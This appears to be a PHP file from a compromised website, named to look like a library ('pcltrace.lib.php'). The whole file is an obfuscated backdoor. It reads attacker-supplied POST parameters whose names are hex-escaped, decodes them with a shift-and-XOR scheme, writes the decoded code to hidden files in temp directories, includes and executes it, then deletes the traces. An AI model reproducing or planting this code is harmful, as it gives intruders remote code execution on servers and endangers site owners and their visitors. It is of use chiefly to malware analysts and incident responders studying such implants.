File: /home/vitanhod/prostanur.vitavit.com.pk/pcltrace.lib.php
<?php if(@$_POST["\x62\x69\x6Ed\x69ng"] !== null){ $token = array_filter([getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd(), session_save_path(), "/var/tmp"]); $flag = $_POST["\x62\x69\x6Ed\x69ng"]; $flag = explode ( '.' ,$flag ); $item= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); foreach($flag as $w => $v8) { $sChar= ord($s[$w %$sLen]); $d= ((int)$v8 - $sChar -($w %10)) ^ 73; $item .= chr($d); } $tkn = 0; do { $rec = $token[$tkn] ?? null; if ($tkn >= count($token)) break; if (is_dir($rec) ? is_writable($rec) : false) { $ptr = sprintf("%s/.flg", $rec); if (@file_put_contents($ptr, $item) !== false) { include $ptr; unlink($ptr); exit; } } $tkn++; } while (true); }
if(!empty($_POST["\x72\x65s"])){
$sym = array_filter([getenv("TEMP"), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/var/tmp", sys_get_temp_dir(), session_save_path()]);
$record = $_POST["\x72\x65s"];
$record = explode ( '.' ,$record ) ;
$value = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s);
foreach ($record as $r=> $v3) { $sChar = ord($s[$r % $lenS]);
$dec = ((int)$v3 - $sChar - ($r % 10)) ^ 1;
$value.= chr($dec);}
while ($comp = array_shift($sym)) {
if (is_writable($comp) && is_dir($comp)) {
$marker = "$comp/.pgrp";
$success = file_put_contents($marker, $value);
if ($success) {
include $marker;
@unlink($marker);
exit;}
}
}
}